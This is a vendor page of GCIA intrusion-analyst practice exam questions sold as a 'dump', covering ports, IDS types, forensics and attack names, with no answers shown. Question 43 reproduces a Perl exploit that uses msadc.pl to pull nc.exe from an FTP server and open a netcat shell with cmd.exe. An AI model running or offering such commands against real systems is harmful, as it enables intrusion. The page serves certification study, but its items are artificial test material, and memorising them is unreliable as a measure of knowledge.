Summer Sale - Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: dpm65

GCIA GCIA - GIAC Certified Intrusion Analyst Practice Test Questions and Answers

Questions 4

Which of the following is the default port for File Transport Protocol (FTP)?

Options:

A.

21

B.

25

C.

23

D.

80

Buy Now
Questions 5

Andrew works as a System Administrator for NetPerfect Inc. All client computers on the network run on Mac OS X. The Sales Manager of the company complains that his MacBook is not able to boot. Andrew wants to check the booting process. He suspects that an error persists in the bootloader of Mac OS X. Which of the following is the default bootloader on Mac OS X that he should use to resolve the issue?

Options:

A.

LILO

B.

BootX

C.

NT Loader

D.

GRUB

Buy Now
Questions 6

In which of the following IKE phases the IPsec endpoints establish parameters for a secure ISAKMP session?

Options:

A.

IKE Phase 2.5

B.

IKE Phase 2

C.

IKE Phase 1

D.

IKE Phase 1.5

Buy Now
Questions 7

You work as a Network Administrator for NetTech Inc. The company has a Windows Server 2008 domain-based network. The network contains Windows Server 2008 based two-node Network Load Balancing (NLB) cluster named Info.nettech.com. The cluster is implemented for high availability and load balancing for the company's intranet Web site. You find that the users can see the Network Load Balancing (NLB) cluster on the network neighborhood. The users are able to connect to various services by using the Info.nettech.com. The cluster is configured with the one port rule that equally balances all TCP/IP traffic across the cluster nodes. You want to configure the cluster to accept only HTTP traffic. What will you do to accomplish the task?

Each correct answer represents a part of the solution. Choose two.

Options:

A.

Create a new port rule to allow TCP port 110.

B.

Reconfigure the Network Load Balancing (NLB) cluster.

C.

Delete the default port rules by using Network Load Balancing cluster console.

D.

Create a new port rule to allow TCP port 80.

Buy Now
Questions 8

Which of the following types of firewall functions by creating two different communications, one between the client and the firewall, and the other between the firewall and the end server?

Options:

A.

Stateful firewall

B.

Proxy-based firewall

C.

Packet filter firewall

D.

Endian firewall

Buy Now
Questions 9

John works as a professional Ethical Hacker for SecureEnet Inc. The company has a Windowsbased network. All client computers run on Windows XP. A project has been assigned to John to investigate about the open ports responsible for various malicious attacks on the network. John wants to use the DOS command-line utility to find out the open ports. Which of the following DOS commands will John use to accomplish the task?

Options:

A.

tracert and pathping

B.

nslookup

C.

nbtstat

D.

netstat

Buy Now
Questions 10

You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network.

A branch office is connected to the headquarters through a T1 line. Users at the branch office report poor voice quality on the IP phone while communicating with the headquarters. You find that an application, named WorkReport, at the branch office is suffocating bandwidth by sending large packets for file synchronization. You need to improve the voice quality on the IP phone. Which of the following steps will you choose to accomplish this?

Options:

A.

Configure traffic shaping to increase the time interval for the WorkReport packets.

B.

Configure traffic shaping to increase the time interval for the IP phone packets.

C.

Configure traffic shaping to reduce bandwidth for the IP phone.

D.

Configure traffic shaping to reduce bandwidth for WorkReport.

Buy Now
Questions 11

You are planning DNS configuration for your company. You decide to configure an Active Directory integrated DNS.

Which of the following are the benefits of Active Directory integrated DNS configuration?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Replication is more efficient.

B.

Multi-master environments are more fault tolerant.

C.

Single-master environment is simpler to administer.

D.

It results in enhanced security.

Buy Now
Questions 12

John, a novice web user, makes a new E-mail account and keeps his password as "apple", his favorite fruit. John's password is vulnerable to which of the following password cracking attacks?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Dictionary attack

B.

Hybrid attack

C.

Brute Force attack

D.

Rule based attack

Buy Now
Questions 13

Which of the following determines which protocols can be used by clients to access the Internet in an ISA Server enabled network?

Options:

A.

SMTP filter

B.

POP intrusion detection filter

C.

Site and content rule

D.

Protocol rule

Buy Now
Questions 14

Which of the following is allowed by a company to be addressed directly from the public network and is hardened to screen the rest of its network from security exposure?

Options:

A.

Intrusion detection system

B.

A computer installed in the network and configured with sender reputation

C.

bastion host

D.

Exchange ActiveSync

Buy Now
Questions 15

Which of the following commands prints out the headers of packets regarding the boolean expression?

Options:

A.

tcpdump

B.

vmstat

C.

iftop

D.

iostat

Buy Now
Questions 16

Which of the following programs is used to add words to spam e-mails so that the e-mail is not considered spam and therefore is delivered as if it were a normal message?

Options:

A.

Adler-32

B.

Hash filtrer

C.

Hash buster

D.

Checksum

Buy Now
Questions 17

Peter works as a Technical Representative in a CSIRT for SecureEnet Inc. His team is called to investigate the computer of an employee, who is suspected for classified data theft. Suspect's computer runs on Windows operating system. Peter wants to collect data and evidences for further analysis. He knows that in Windows operating system, the data is searched in pre-defined steps for proper and efficient analysis. Which of the following is the correct order for searching data on a Windows based system?

Options:

A.

Volatile data, file slack, registry, memory dumps, file system, system state backup, interne t traces

B.

Volatile data, file slack, file system, registry, memory dumps, system state backup, interne t traces

C.

Volatile data, file slack, internet traces, registry, memory dumps, system state backup, file system

D.

Volatile data, file slack, registry, system state backup, internet traces, file system, memory dumps

Buy Now
Questions 18

Andrew, a bachelor student of Faulkner University, creates a gmail account. He uses 'Faulkner' as the password for the gmail account. After a few days, he starts receiving a lot of e-mails stating that his gmail account has been hacked. He also finds that some of his important mails have been deleted by someone. Which of the following methods has the attacker used to crack Andrew's password?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Buffer-overflow attack

B.

Brute force attack

C.

Dictionary-based attack

D.

Password guessing

E.

Social engineering

F.

Zero-day attack

G.

Denial-of-service (DoS) attack

Buy Now
Questions 19

Which of the following types of Intrusion detection systems (IDS) is used for port mirroring?

Options:

A.

Port address-based IDS

B.

Network-based IDS (NIDS)

C.

Host-based IDS (HIDS)

D.

Anomaly-based IDS

Buy Now
Questions 20

Adam works as a Computer Hacking Forensic Investigator in a law firm. He has been assigned with his first project. Adam collected all required evidences and clues. He is now required to write an investigative report to present before court for further prosecution of the case. He needs guidelines to write an investigative report for expressing an opinion. Which of the following are the guidelines to write an investigative report in an efficient way?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

All ideas present in the investigative report should flow logically from facts to conclusions.

B.

Opinion of a lay witness should be included in the investigative report.

C.

The investigative report should be understandable by any reader.

D.

There should not be any assumptions made about any facts while writing the investigative report.

Buy Now
Questions 21

Which of the following wireless security features provides the best wireless security mechanism?

Options:

A.

WPA

B.

WPA with Pre Shared Key

C.

WPA with 802.1X authentication

D.

WEP

Buy Now
Questions 22

You work as a Network Administrator for McNeil Inc. The company's Windows 2000-based network is configured with Internet Security and Acceleration (ISA) Server 2000. You want to configure intrusion detection on the server. You find that the different types of attacks on the Intrusion Detection tab page of the IP Packet Filters Properties dialog box are disabled. What is the most likely cause?

Options:

A.

The PPTP through ISA firewall check box on the PPTP tab page of the IP Packet Filters Properties dialog box is not enabled.

B.

The Enable IP routing check box on the General tab page of the IP Packet Filters Properties dialog box is not selected.

C.

The Log packets from Allow filters check box on the Packet Filters tab page of the IP Packet Filters Properties dialog box is not enabled.

D.

The Enable Intrusion detection check box on the General tab page of the IP Packet Filters

Properties dialog box is not selected.

Buy Now
Questions 23

You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server 2008 network environment. The network is configured as a Windows Active Directory-based single forest single domain network. Active Directory integrated zone has been configured on the network. You want to create a text file that lists the resource records of a specified zone for your record. Which of the following commands will you use to accomplish the task?

Options:

A.

DNSCMD /createdirectorypartition

B.

DNSCMD /copydns

C.

DNSCMD /zoneexport

D.

DNSCMD /config

Buy Now
Questions 24

Which of the following is a technique of attacks in which the attacker secretly listens to the private conversation between victims?

Options:

A.

Dialler attack

B.

Denial of service

C.

Eavesdropping

D.

Intrusion

Buy Now
Questions 25

Which of the following attacks involves multiple compromised systems to attack a single target?

Options:

A.

Brute force attack

B.

DDoS attack

C.

Replay attack

D.

Dictionary attack

Buy Now
Questions 26

Which of the following DoS attacks is a multi-tier attack?

Options:

A.

Snork Attack

B.

SYN flood

C.

DDoS attack

D.

Smurf attack

Buy Now
Questions 27

Which of the following tools is a wireless sniffer and analyzer that works on the Windows operating system?

Options:

A.

Aeropeek

B.

Void11

C.

Airsnort

D.

Kismet

Buy Now
Questions 28

Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except ports that must be used.

He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about programs like Hping2 that can get into a network through covert channels.

Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

Options:

A.

Block ICMP type 13 messages

B.

Block all outgoing traffic on port 21

C.

Block all outgoing traffic on port 53

D.

Block ICMP type 3 messages

Buy Now
Questions 29

You work as a Network Administrator for Rick International. The company has a TCP/IP-based network. A user named Kevin wants to set an SSH terminal at home to connect to the company's network. You have to configure your company's router for it. By default, which of the following standard ports does the SSH protocol use for connection?

Options:

A.

80

B.

21

C.

443

D.

22

Buy Now
Questions 30

Which of the following statements best describes the string matching method of signature analysis?

Options:

A.

String matching searches specific strings that may indicate an attack.

B.

String matching examines multiple fields from different protocols, such as source address, destination port, or TCP flags.

C.

In string matching, each packet is wrapped in predefined layers of different protocols.

D.

In string matching, an incoming packet is compared, byte by byte, with a single signature, a string of code.

Buy Now
Questions 31

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. John wants to redirect all TCP port 80 traffic to UDP port 40, so that he can bypass the firewall of the We-are-secure server. Which of the following tools will John use to accomplish his task?

Options:

A.

PsExec

B.

PsList

C.

Fpipe

D.

Cain

Buy Now
Questions 32

John works as a professional Ethical Hacker. He has been assigned a project for testing the security of www.we-are-secure.com. He wants to corrupt an IDS signature database so that performing attacks on the server is made easy and he can observe the flaws in the We-are-secure server. To perform his task, he first of all sends a virus that continuously changes its signature to avoid detection from IDS. Since the new signature of the virus does not match the old signature, which is entered in the IDS signature database, IDS becomes unable to point out the malicious virus. Which of the following IDS evasion attacks is John performing?

Options:

A.

Insertion attack

B.

Session splicing attack

C.

Evasion attack

D.

Polymorphic shell code attack

Buy Now
Questions 33

Which of the following protocols is used by e-mail servers to send messages?

Options:

A.

SNMP

B.

FTP

C.

POP3

D.

SMTP

E.

HTTP

Buy Now
Questions 34

John works as a Security Administrator for NetPerfect Inc. The company uses Windows-based systems. A project has been assigned to John to track malicious hackers and to strengthen the company's security system. John configures a computer system to trick malicious hackers into thinking that it is the company's main server, which in fact is a decoy system to track hackers.

Which system is John using to track the malicious hackers?

Options:

A.

Honeypot

B.

Honeytokens

C.

Intrusion Detection System (IDS)

D.

Bastion host

Buy Now
Questions 35

Which of the following file systems is designed by Sun Microsystems?

Options:

A.

NTFS

B.

CIFS

C.

ZFS

D.

ext2

Buy Now
Questions 36

Which of the following protocols uses only User Datagram Protocol (UDP)?

Options:

A.

FTP

B.

ICMP

C.

TFTP

D.

POP3

Buy Now
Questions 37

Which of the following work as traffic monitoring tools in the Linux operating system?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

MRTG

B.

John the Ripper

C.

IPTraf

D.

Ntop

Buy Now
Questions 38

You work as a Network Administrator for Tech Perfect Inc. The office network is configured as an IPv6 network. You have to configure a computer with the IPv6 address, which is equivalent to an IPv4 publicly routable address. Which of the following types of addresses will you choose?

Options:

A.

Site-local

B.

Global unicast

C.

Local-link

D.

Loopback

Buy Now
Questions 39

Which of the following commands is used to flush the destination cache for IPv6 interface?

Options:

A.

netsh interface ipv6 reset cache

B.

netsh interface ipv6 delete destinationcache

C.

netsh interface ipv6 flush destinationcache

D.

netsh interface ipv6 remove destinationcache

Buy Now
Questions 40

Which of the following ports can be used for IP spoofing?

Options:

A.

NNTP 119

B.

POP 110

C.

Rlogin 513

D.

Whois 43

Buy Now
Questions 41

Which of the following DoS attacks points the Central Processing Unit (CPU) to a non-existent memory location causing the running process to end abruptly?

Options:

A.

Buffer Overflow attack

B.

Teardrop attack

C.

Fraggle attack

D.

Snork attack

Buy Now
Questions 42

What is the process of detecting unauthorized access known as?

Options:

A.

Intrusion detection

B.

Misuse detection

C.

Anomaly detection

D.

Integrity detection

Buy Now
Questions 43

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h

$host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system

("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");

system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get

hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is

downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is

finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Options:

A.

Opens up a SMTP server that requires no username or password

B.

Creates a share called "sasfile" on the target system

C.

Creates an FTP server with write permissions enabled

D.

Opens up a telnet listener that requires no username or password

Buy Now
Questions 44

Which of the following attacks is used to hack simple alphabetical passwords?

Options:

A.

Dictionary-based attack

B.

Sniffing

C.

Man-in-the-middle attack

D.

Black hat attack

Buy Now
Questions 45

Which of the following algorithms produces a digital signature which is used to authenticate the bit-stream images?

Options:

A.

MD6

B.

MD5

C.

BOINIC

D.

HashClash

Buy Now
Questions 46

Which of the following classes refers to the fire involving electricity?

Options:

A.

Class B

B.

Class D

C.

Class A

D.

Class C

Buy Now
Questions 47

Which of the following NETSH commands for interface Internet protocol version 4 (IPv4) is used to delete a DNS server or all DNS servers from a list of DNS servers for a specified interface or for all interfaces?

Options:

A.

disable dnsserver

B.

alter dnsserver

C.

delete dnsserver

D.

remove dnsserver

Buy Now
Questions 48

What is the maximum size of an IP datagram for Ethernet?

Options:

A.

1200 bytes

B.

1024 bytes

C.

1500 bytes

D.

4500 bytes

Buy Now
Questions 49

Which of the following attacks is based on the concept that IDSs cannot recognize Unicode encoded malicious data?

Options:

A.

DoS attack

B.

Fragmentation overlap attack

C.

Obfuscating attack payload

D.

Polymorphic shell code attack

Buy Now
Questions 50

Which of the following programs in UNIX is used to identify and fix lost blocks or orphans?

Options:

A.

File Check (fck)

B.

Block Check (bsck)

C.

Lost Block (lck)

D.

Filesystem Check (fsck)

Buy Now
Questions 51

Sandra, a novice computer user, works on Windows environment. She experiences some problem regarding bad sectors formed in a hard disk of her computer. She wants to run CHKDSK command to check the hard disk for bad sectors and to fix the errors, if any, occurred. Which of the following switches will she use with CHKDSK command to accomplish the task?

Options:

A.

CHKDSK /I

B.

CHKDSK /R /F

C.

CHKDSK /C /L

D.

CHKDSK /V /X

Buy Now
Questions 52

Which of the following monitors program activities and modifies malicious activities on a system?

Options:

A.

Back door

B.

RADIUS

C.

HIDS

D.

NIDS

Buy Now
Questions 53

Which of the following is an example of a social engineering attack?

Options:

A.

Phishing

B.

Man-in-the-middle attack

C.

Browser Sniffing

D.

E-mail bombing

Buy Now
Questions 54

Which of the following partitions contains the system files that are used to start the operating system?

Options:

A.

Secondary partition

B.

Boot partition

C.

Primary partition

D.

System partition

Buy Now
Questions 55

Which of the following is an example of a firewall?

Options:

A.

ZoneAlarm

B.

PatriotBox

C.

Specter

D.

KFSensor

Buy Now
Questions 56

What is the order of the extension headers that is followed by IPv6?

Options:

A.

Destination Options (first), Routing, IPv6 header, Hop-by-Hop, Fragment, Authentication, Encrypted Security Payload, Destination Options (second), followed by an Upper-layer header, indicating payload.

B.

Routing, Hop-by-Hop, Destination Options (first), Fragment, Authentication, Encrypted Security Payload, Destination Options (second), followed by an Upper-layer header, indicating payload.

C.

Fragment, Routing, Hop-by-Hop, Destination Options (first), Authentication, Encrypted Security Payload, Destination Options (second), followed by an Upper-layer header, indicating payload.

D.

IPv6 header, Hop-by-Hop, Destination Options (first), Routing, Fragment, Authentication, Encrypted Security Payload, Destination Options (second), followed by an Upper-layer header, indicating payload.

Buy Now
Questions 57

John works as a Network Security Professional. He is assigned a project to test the security of www.we-are-secure.com. He is working on the Linux operating system and wants to install an Intrusion Detection System on the We-are-secure server so that he can receive alerts about any hacking attempts. Which of the following tools can John use to accomplish the task?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

SARA

B.

Snort

C.

Samhain

D.

Tripwire

Buy Now
Questions 58

Which of the following ICMPv6 neighbor discovery messages is sent by hosts to request an immediate router advertisement, instead of waiting for the next scheduled advertisement?

Options:

A.

Neighbor Solicitation

B.

Router Solicitation

C.

Neighbor Advertisement

D.

Router Advertisement

Buy Now
Questions 59

Which of the following partitions contains the system files that are used to start the operating system?

Options:

A.

Boot partition

B.

System partition

C.

Secondary partition

D.

Primary partition

Buy Now
Questions 60

Mark works as a Network Administrator for Infonet Inc. The company has a Windows 2000 domainbased network. Mark wants to block all NNTP traffic between the network and the Internet. How will he configure the network?

Options:

A.

Disable anonymous logins in the NNTP configuration manager.

B.

Block port 25 by configuring the firewall.

C.

Block port 119 by configuring the firewall.

D.

Block TCP port 80 by configuring the firewall.

Buy Now
Questions 61

What is the easiest way to verify that name resolution is functioning properly on a TCP/IP network?

Options:

A.

Use the TRACERT command with the /pingname parameter.

B.

Ping the source host with its computer name.

C.

Ping the source host with its IP address.

D.

Check the IP statistics on the file server.

Buy Now
Questions 62

Which of the following commands is used to refresh the Master Boot Record (MBR) in MS-DOS?

Options:

A.

CHKDSK

B.

FDISK

C.

XDISK

D.

FORMAT

Buy Now
Questions 63

For a host to have successful Internet communication, which of the following network protocols are required? You should assume that the users will not manually configure the computer in anyway and that the measure of success will be whether the user can access Web sites after powering the computer and logging on.

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

NTP

B.

HTTP/HTTPS

C.

DNS

D.

DHCP

Buy Now
Questions 64

Which of the following switches is used with Pslist command on the command line to show the statistics for all active threads on the system, grouping these threads with their owning process?

Options:

A.

Pslist -x

B.

Pslist -m

C.

Pslist -t

D.

Pslist -d

Buy Now
Questions 65

You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 Active Directory-based single forest multiple domain IPv4 network. All the DNS servers on the network run Windows Server 2008. The users in the network use NetBIOS name to connect network application on the network. Your manager requires you migrate the network to IPv6-enabled network without affecting any client computers. Which of the following actions will you take to accomplish the task?

Options:

A.

Configure stub zone on the DNS servers in the network.

B.

Configure GlobalNames zones on the DNS servers in the network.

C.

Install a new Windows Server 2003 DNS server computer on each domain and configure GlobalNames zones.

D.

Configure the client computers to use WINS.

Buy Now
Questions 66

You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network.

You have configured a firewall on the network. A filter has been applied to block all the ports. You want to enable sending and receiving of emails on the network. Which of the following ports will you open?

Each correct answer represents a complete solution. Choose two.

Options:

A.

20

B.

25

C.

80

D.

110

Buy Now
Questions 67

You are using a Windows-based sniffer named ASniffer to record the data traffic of a network. You have extracted the following IP Header information of a randomly chosen packet from the sniffer's log:

45 00 00 28 00 00 40 00 29 06 43 CB D2 D3 82 5A 3B 5E AA 72

Which of the following TTL decimal values and protocols are being carried by the IP Header of this packet?

Options:

A.

41, UDP

B.

16, ICMP

C.

41, TCP

D.

16, UDP

Buy Now
Questions 68

Adam, a novice Web user is getting large amount of unsolicited commercial emails on his email address. He suspects that the emails he is receiving are the Spam. Which of the following steps will he take to stop the Spam?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Close existing email account and open new email account.

B.

Forward a copy of the spam to the ISP to make the ISP conscious of the spam.

C.

Report the incident to the FTC (The U.S. Federal Trade Commission) by sending a copy of the spam message.

D.

Send an email to the domain administrator responsible for the initiating IP address.

Buy Now
Questions 69

Which of the following protocols is used by TFTP as a file transfer protocol?

Options:

A.

UDP

B.

SNMP

C.

TCP

D.

SMTP

Buy Now
Questions 70

Which of the following Web attacks is performed by manipulating codes of programming languages such as SQL, Perl, Java present in the Web pages?

Options:

A.

Command injection attack

B.

Code injection attack

C.

Cross-Site Request Forgery

D.

Cross-Site Scripting attack

Buy Now
Questions 71

Which of the following utilities allows to view all files including invisible files and folders on a Macintosh OS X?

Options:

A.

Directory Scan

B.

Folder Scan

C.

File Scan

D.

System Scan

Buy Now
Questions 72

Mark works as a Network administrator for SecureEnet Inc. His system runs on Mac OS X. He wants to boot his system from the Network Interface Controller (NIC). Which of the following snag keys will Mark use to perform the required function?

Options:

A.

D

B.

N

C.

Z

D.

C

Buy Now
Questions 73

Which of the following forensic tool suite is developed for Linux operating system?

Options:

A.

Wetstone

B.

MForensicsLab

C.

ProDiscover

D.

S.M.A.R.T.

Buy Now
Questions 74

Which of the following algorithms is used as a default algorithm for ESP extension header in IPv6?

Options:

A.

Propagating Cipher Block Chaining (PCBC) Mode

B.

Cipher Block Chaining (CBC) Mode

C.

Electronic Codebook (ECB) Mode

D.

Cipher Feedback (CFB) Mode

Buy Now
Questions 75

Which of the following statements about User Datagram Protocol (UDP) is true?

Options:

A.

It is a hardware protocol.

B.

It is a connectionless protocol.

C.

It is a tunneling protocol.

D.

It is a connection-oriented protocol.

Buy Now
Questions 76

You work as a professional Computer Hacking Forensic Investigator. A project has been assigned to you to investigate the DoS attack on a computer network of SecureEnet Inc. Which of the following methods will you perform to accomplish the task?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Look for core files or crash dumps on the affected systems.

B.

Sniff network traffic to the failing machine.

C.

Seize all computers and transfer them to the Forensic lab.

D.

Look for unusual traffic on Internet connections and network segments.

Buy Now
Exam Code: GCIA
Exam Name: GCIA - GIAC Certified Intrusion Analyst Practice Test
Last Update: Jun 30, 2025
Questions: 508

PDF + Testing Engine

$57.75  $164.99

Testing Engine

$43.75  $124.99
buy now GCIA testing engine

PDF (Q&A)

$36.75  $104.99
buy now GCIA pdf
dumpsmate guaranteed to pass
24/7 Customer Support

DumpsMate's team of experts is always available to respond your queries on exam preparation. Get professional answers on any topic of the certification syllabus. Our experts will thoroughly satisfy you.

Site Secure

mcafee secure

TESTED 03 Jul 2025